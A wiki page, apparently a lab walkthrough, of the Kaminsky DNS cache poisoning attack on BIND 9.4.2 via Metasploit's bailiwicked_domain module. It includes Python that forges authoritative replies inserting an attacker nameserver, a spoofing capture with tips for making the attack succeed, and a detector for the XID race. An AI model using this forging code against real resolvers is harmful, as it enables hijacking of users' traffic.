From charlesreid1

Revision as of 06:46, 26 March 2016 by Admin

Searching for Exploits

Searching for exploits for the DNS service that is running, ISC BIND 9.4.2, we find the following entry on Exploit-DB: https://www.exploit-db.com/exploits/6122/

This entry is the Metasploit module auxiliary/spoof/dns/bailiwicked_domain, an implementation of the 2008 Kaminsky DNS cache poisoning attack (CVE-2008-1447; BIND versions before 9.4.2-P1 are affected). It is an auxiliary module rather than a memory corruption exploit: it does not give us a shell on the BIND host, but it lets us insert a malicious NS record for a domain of our choosing into the resolver's cache, provided the target resolver performs recursion for us and sends its upstream queries from a predictable source port.

DNS Exploit: bailiwicked domain

We can use this exploit by running:

msf > use auxiliary/spoof/dns/bailiwicked_domain

More information:

This exploit targets a fairly ubiquitous flaw in DNS implementations
which allow the insertion of malicious DNS records into the cache of the
target nameserver.  This exploit caches a single malicious nameserver
entry into the target nameserver which replaces the legitimate
nameservers for the target domain.  By causing the target nameserver to
query for random hostnames at the target domain, the attacker can spoof
a response to the target server including an answer for the query, an
authority server record, and an additional record for that server,
causing target nameserver to insert the additional record into the
cache.  This insertion completely replaces the original nameserver
records for the target domain.

To interpret:

  • Metasploit first asks the target nameserver for the target domain's NS records, so it knows which legitimate authoritative servers it has to forge replies from, and measures how quickly the target gets real answers back, which decides how many spoofed replies it can get in per query.
  • It then repeatedly asks the target nameserver for random hostnames under the target domain (jYasQEH2mW9y.charlesreid1.com in the capture below). Each one is a cache miss, so the target has to go out and query the authoritative servers, and each miss is one more roll of the dice.
  • For each of those queries, Metasploit floods the target with forged replies that carry the source address of a legitimate authoritative server and a guessed 16-bit transaction ID (XID). Only a reply that arrives before the genuine one, on the right port, with the right XID, is accepted.
  • A forged reply that wins the race carries an answer for the random name, an authority record saying the target domain's nameserver is the attacker's host, and an additional (glue) record with that host's IP address. The target caches the authority and glue records because they are "in bailiwick", i.e. inside the domain it was asking about.
  • From then on the target nameserver has replaced the domain's legitimate NS records with the one Metasploit supplied, for as long as the TTL set in the attack lasts.
  • Anyone resolving a name in the target domain through the target nameserver is now sent to the attacker's nameserver, which can answer with whatever addresses it likes, or proxy the query to the real servers and alter the replies on the way back.
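To make the record structure concrete, here is an added example (written for this page, not Metasploit's own module code) that builds such a forged reply byte by byte and estimates the odds of the transaction-ID race. The nameserver name ns.attacker.example, the addresses 10.0.0.5 and 198.51.100.x, and the 1024-65535 ephemeral port range are assumptions for illustration; the query name and the answer address are taken from the capture later on the page.

```python
"""Build the forged DNS reply the bailiwicked_domain description talks about
(1 answer, 1 authority, 1 additional) and estimate the odds of the XID race.
Added example for this page; not Metasploit code."""
import struct

QTYPE_A, QTYPE_NS, CLASS_IN = 1, 2, 1
FLAGS_QR_AA = 0x8400  # QR=1 (response), AA=1 (authoritative), RA=0; tcpdump prints "*-"


def encode_name(name: str) -> bytes:
    """Dotted hostname -> uncompressed DNS label sequence, e.g. 0c'charlesreid1' 03'com' 00."""
    out = bytearray()
    for label in name.rstrip(".").split("."):
        raw = label.encode("ascii")
        if not 1 <= len(raw) <= 63:
            raise ValueError("bad label %r" % label)
        out.append(len(raw))
        out += raw
    out.append(0)
    return bytes(out)


def ipv4(addr: str) -> bytes:
    return bytes(int(o) for o in addr.split("."))


def rr(name: str, rtype: int, ttl: int, rdata: bytes) -> bytes:
    """One resource record: NAME TYPE CLASS TTL RDLENGTH RDATA."""
    return encode_name(name) + struct.pack("!HHIH", rtype, CLASS_IN, ttl, len(rdata)) + rdata


def forged_response(xid, qname, target_domain, new_ns, new_ns_ip, answer_ip, ttl=40000):
    """Forged reply for a query about a random label under target_domain.

    Answer:     qname         A   answer_ip   (throwaway; what the query asked for)
    Authority:  target_domain NS  new_ns      (the record we want the target to cache)
    Additional: new_ns        A   new_ns_ip   (glue, so the target knows where new_ns lives)
    The authority and glue records are "in bailiwick" (inside target_domain), so a
    resolver that accepts the reply also overwrites its NS entry for the domain.
    """
    header = struct.pack("!HHHHHH", xid, FLAGS_QR_AA, 1, 1, 1, 1)  # 1 question, 1/1/1 records
    question = encode_name(qname) + struct.pack("!HH", QTYPE_A, CLASS_IN)
    answer = rr(qname, QTYPE_A, ttl, ipv4(answer_ip))
    authority = rr(target_domain, QTYPE_NS, ttl, encode_name(new_ns))
    additional = rr(new_ns, QTYPE_A, ttl, ipv4(new_ns_ip))
    return header + question + answer + authority + additional


def header_counts(pkt: bytes):
    """(xid, flags, qdcount, ancount, nscount, arcount) of a DNS message."""
    return struct.unpack("!HHHHHH", pkt[:12])


def spoof_batch(xids, legit_ns_ips, **fields):
    """One forged reply per (guessed XID, legitimate authoritative address): the
    attacker cannot see which server the target asked, so each guess is sent as if
    from every one of them, which is the alternating pattern the capture shows."""
    return [(src, forged_response(xid, **fields)) for xid in xids for src in legit_ns_ips]


def success_probability(rounds, guesses_per_round, port_randomized=False):
    """Probability of winning the race within `rounds` random-label queries.
    Fixed source port: only the 16-bit XID is unknown (65536 values).
    Randomized port (assumed ephemeral range 1024-65535, 64512 ports): the
    attacker must guess XID and port together, 65536 * 64512 values."""
    space = 65536 * (64512 if port_randomized else 1)
    p_round = min(1.0, guesses_per_round / space)
    return 1.0 - (1.0 - p_round) ** rounds


if __name__ == "__main__":
    batch = spoof_batch(range(28054, 28063), ["198.51.100.1", "198.51.100.2"],  # constructed NS addresses
                        qname="jYasQEH2mW9y.charlesreid1.com",
                        target_domain="charlesreid1.com",
                        new_ns="ns.attacker.example",   # hypothetical NEWDNS
                        new_ns_ip="10.0.0.5",           # hypothetical TARGETHOST
                        answer_ip="173.174.209.222")
    for src, pkt in batch[:2]:
        xid, flags, qd, an, ns, ar = header_counts(pkt)
        print("from %s: xid=%d flags=0x%04x sections=%d/%d/%d (%d bytes)"
              % (src, xid, flags, an, ns, ar, len(pkt)))
    print("fixed source port, 200 guesses x 500 queries: %.2f" % success_probability(500, 200))
    print("randomized source port, same effort:         %.6f" % success_probability(500, 200, True))
```

The probability function is the reason source port randomization (BIND 9.4.2-P1 and later) mostly ends this attack: the same flood that wins in a few hundred queries against a fixed port makes almost no progress when port and XID both have to be guessed.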

Doing It

We set up the attack by pointing the module at the target resolver (RHOST) and filling in the domain to hijack (TARGETDOMAIN), the hostname and IP address of the nameserver we want the target to cache for it (NEWDNS and TARGETHOST), and the source port the target uses for its outgoing queries (SRCPORT), which has to match exactly or none of the forged replies will be accepted.

Watching in another window with tcpdump:

# tcpdump -i eth0

[...]

23:45:29.567700 IP dns1.registrar-servers.com.domain > 10.0.0.27.0: 28061*- 1/1/1 A 173.174.209.222 (109)
23:45:29.568213 IP dns2.namecheaphosting.com.domain > 10.0.0.27.0: 28061*- 1/1/1 A 173.174.209.222 (109)
23:45:29.568730 IP dns1.registrar-servers.com.domain > 10.0.0.27.0: 28061*- 1/1/1 A 173.174.209.222 (109)
23:45:29.569319 IP dns1.registrar-servers.com.domain > 10.0.0.27.0: 28062*- 1/1/1 A 173.174.209.222 (109)
23:45:29.569839 IP dns2.namecheaphosting.com.domain > 10.0.0.27.0: 28062*- 1/1/1 A 173.174.209.222 (109)
23:45:29.570284 IP dns1.registrar-servers.com.domain > 10.0.0.27.0: 28062*- 1/1/1 A 173.174.209.222 (109)
23:45:29.570763 IP dns2.namecheaphosting.com.domain > 10.0.0.27.0: 28062*- 1/1/1 A 173.174.209.222 (109)
23:45:29.571290 IP dns1.registrar-servers.com.domain > 10.0.0.27.0: 28062*- 1/1/1 A 173.174.209.222 (109)
23:45:29.572253 IP morpheus.55550 > 10.0.0.27.domain: 27562+ A? jYasQEH2mW9y.charlesreid1.com. (47)
23:45:29.573087 IP dns1.registrar-servers.com.domain > 10.0.0.27.0: 28054*- 1/1/1 A 173.174.209.222 (106)
23:45:29.573567 IP dns2.namecheaphosting.com.domain > 10.0.0.27.0: 28054*- 1/1/1 A 173.174.209.222 (106)
23:45:29.574057 IP dns1.registrar-servers.com.domain > 10.0.0.27.0: 28054*- 1/1/1 A 173.174.209.222 (106)
23:45:29.574547 IP dns2.namecheaphosting.com.domain > 10.0.0.27.0: 28054*- 1/1/1 A 173.174.209.222 (106)
23:45:29.575073 IP dns1.registrar-servers.com.domain > 10.0.0.27.0: 28054*- 1/1/1 A 173.174.209.222 (106)
23:45:29.575629 IP dns1.registrar-servers.com.domain > 10.0.0.27.0: 28055*- 1/1/1 A 173.174.209.222 (106)
23:45:29.576126 IP dns2.namecheaphosting.com.domain > 10.0.0.27.0: 28055*- 1/1/1 A 173.174.209.222 (106)
23:45:29.576616 IP dns1.registrar-servers.com.domain > 10.0.0.27.0: 28055*- 1/1/1 A 173.174.209.222 (106)
23:45:29.577105 IP dns2.namecheaphosting.com.domain > 10.0.0.27.0: 28055*- 1/1/1 A 173.174.209.222 (106)
23:45:29.577631 IP dns1.registrar-servers.com.domain > 10.0.0.27.0: 28055*- 1/1/1 A 173.174.209.222 (106)
23:45:29.578189 IP dns1.registrar-servers.com.domain > 10.0.0.27.0: 28056*- 1/1/1 A 173.174.209.222 (106)
23:45:29.578677 IP dns2.namecheaphosting.com.domain > 10.0.0.27.0: 28056*- 1/1/1 A 173.174.209.222 (106)
23:45:29.579202 IP dns1.registrar-servers.com.domain > 10.0.0.27.0: 28056*- 1/1/1 A 173.174.209.222 (106)
23:45:29.579627 IP dns2.namecheaphosting.com.domain > 10.0.0.27.0: 28056*- 1/1/1 A 173.174.209.222 (106)
23:45:29.580125 IP dns1.registrar-servers.com.domain > 10.0.0.27.0: 28056*- 1/1/1 A 173.174.209.222 (106)
23:45:29.580734 IP dns1.registrar-servers.com.domain > 10.0.0.27.0: 28057*- 1/1/1 A 173.174.209.222 (106)
23:45:29.581253 IP dns2.namecheaphosting.com.domain > 10.0.0.27.0: 28057*- 1/1/1 A 173.174.209.222 (106)
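Reading the capture: the lines from dns1.registrar-servers.com and dns2.namecheaphosting.com are not real replies from those servers, they are Metasploit's forgeries, each guessed transaction ID sent once per legitimate authoritative address because the target could have asked either. `*-` is tcpdump's notation for an authoritative answer with the recursion-available bit clear, and `1/1/1` is the answer/authority/additional count described earlier. The query from morpheus for jYasQEH2mW9y.charlesreid1.com is the random-label trigger. One thing to check before leaving the attack running: the forged replies are addressed to 10.0.0.27.0, i.e. UDP port 0, so no resolver socket will ever receive them. SRCPORT must match the port the target really sends its upstream queries from; confirm it by watching the target's own outgoing query (tcpdump on the target, or a query against a server you control) and set it explicitly. The following added example (not part of the page's original material; the sample lines are an excerpt of the capture above, embedded here as constructed inline input) parses tcpdump's DNS summary lines and performs that check, plus the defender's complementary one: a burst of "authoritative" replies carrying several different XIDs inside a few milliseconds is the signature of this race.

```python
"""Parse tcpdump DNS summary lines like the capture above and check what the
spoofed replies are actually doing.  Added example for this page, not part of
Metasploit; SAMPLE is an excerpt of the capture above, embedded as test input."""
import re

# "<ts> IP <host>.<port> > <host>.<port>: <xid><flags> <rest>"; the port is a
# number or a service name such as "domain".
LINE = re.compile(
    r"^(?P<ts>\d\d:\d\d:\d\d\.\d{6}) IP (?P<src>\S+) > (?P<dst>\S+): "
    r"(?P<xid>\d+)(?P<flags>[-*|$+]*) (?P<rest>.*)$"
)
RESPONSE = re.compile(r"^(?P<an>\d+)/(?P<ns>\d+)/(?P<ar>\d+) (?P<rr>.+) \((?P<size>\d+)\)$")
QUERY = re.compile(r"^(?P<qtype>[A-Z]+)\? (?P<qname>\S+) \((?P<size>\d+)\)$")

SAMPLE = """\
23:45:29.567700 IP dns1.registrar-servers.com.domain > 10.0.0.27.0: 28061*- 1/1/1 A 173.174.209.222 (109)
23:45:29.568213 IP dns2.namecheaphosting.com.domain > 10.0.0.27.0: 28061*- 1/1/1 A 173.174.209.222 (109)
23:45:29.569319 IP dns1.registrar-servers.com.domain > 10.0.0.27.0: 28062*- 1/1/1 A 173.174.209.222 (109)
23:45:29.569839 IP dns2.namecheaphosting.com.domain > 10.0.0.27.0: 28062*- 1/1/1 A 173.174.209.222 (109)
23:45:29.572253 IP morpheus.55550 > 10.0.0.27.domain: 27562+ A? jYasQEH2mW9y.charlesreid1.com. (47)
23:45:29.573087 IP dns1.registrar-servers.com.domain > 10.0.0.27.0: 28054*- 1/1/1 A 173.174.209.222 (106)
23:45:29.573567 IP dns2.namecheaphosting.com.domain > 10.0.0.27.0: 28054*- 1/1/1 A 173.174.209.222 (106)
23:45:29.575629 IP dns1.registrar-servers.com.domain > 10.0.0.27.0: 28055*- 1/1/1 A 173.174.209.222 (106)
""".splitlines()


def ts_to_us(ts):
    """'23:45:29.567700' -> integer microseconds since midnight (exact, no float)."""
    hms, frac = ts.split(".")
    h, m, s = (int(x) for x in hms.split(":"))
    return ((h * 60 + m) * 60 + s) * 1_000_000 + int(frac)


def parse_line(line):
    """One tcpdump line -> dict, or None for lines that are not DNS summaries."""
    m = LINE.match(line.strip())
    if not m:
        return None
    src_host, src_port = m["src"].rsplit(".", 1)
    dst_host, dst_port = m["dst"].rsplit(".", 1)
    rec = {"ts_us": ts_to_us(m["ts"]), "src": src_host, "src_port": src_port,
           "dst": dst_host, "dst_port": dst_port, "xid": int(m["xid"]),
           "flags": m["flags"], "aa": "*" in m["flags"]}
    r = RESPONSE.match(m["rest"])
    if r:
        rec.update(kind="response", an=int(r["an"]), ns=int(r["ns"]),
                   ar=int(r["ar"]), size=int(r["size"]))
        return rec
    q = QUERY.match(m["rest"])
    if q:
        rec.update(kind="query", qtype=q["qtype"], qname=q["qname"], size=int(q["size"]))
        return rec
    return None


def max_xids_in_window(responses, window_us):
    """Largest number of distinct XIDs seen in any window_us-long span (input in time order)."""
    best = 0
    for i, r in enumerate(responses):
        in_window = {x["xid"] for x in responses[i:] if x["ts_us"] - r["ts_us"] <= window_us}
        best = max(best, len(in_window))
    return best


def analyze(lines, window_us=10_000, min_distinct_xids=3):
    recs = [r for r in map(parse_line, lines) if r]
    queries = [r for r in recs if r["kind"] == "query"]
    responses = [r for r in recs if r["kind"] == "response"]
    report = {"queries": len(queries), "responses": len(responses), "warnings": []}
    if not responses:
        return report
    report["sources"] = sorted({r["src"] for r in responses})
    report["dst_ports"] = sorted({r["dst_port"] for r in responses})
    report["distinct_xids"] = len({r["xid"] for r in responses})
    report["elapsed_us"] = responses[-1]["ts_us"] - responses[0]["ts_us"]
    report["all_aa_1_1_1"] = all(r["aa"] and (r["an"], r["ns"], r["ar"]) == (1, 1, 1)
                                 for r in responses)
    report["max_xids_in_window"] = max_xids_in_window(responses, window_us)
    # Attacker-side sanity check: forged replies must reach the port the target
    # resolver sends its queries from; port 0 means SRCPORT was never resolved.
    if "0" in report["dst_ports"]:
        report["warnings"].append("replies addressed to UDP port 0: set SRCPORT to the target's real query port")
    # Defender-side signature: many 'authoritative' replies with different XIDs
    # to one host inside a few milliseconds is an XID-guessing race.
    if report["max_xids_in_window"] >= min_distinct_xids:
        report["warnings"].append("XID-guessing burst: %d distinct XIDs within %d us"
                                  % (report["max_xids_in_window"], window_us))
    return report


if __name__ == "__main__":
    for key, value in analyze(SAMPLE).items():
        print("%-20s %s" % (key, value))
```

Run as-is it reports one query, seven forged replies from two forged sources, four distinct XIDs within about 8 ms, every reply authoritative with a 1/1/1 layout, and both warnings. The same `analyze` function run over the resolver's inbound traffic is a cheap detector for this class of attack, independent of whether the attacker got the port right.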

Flags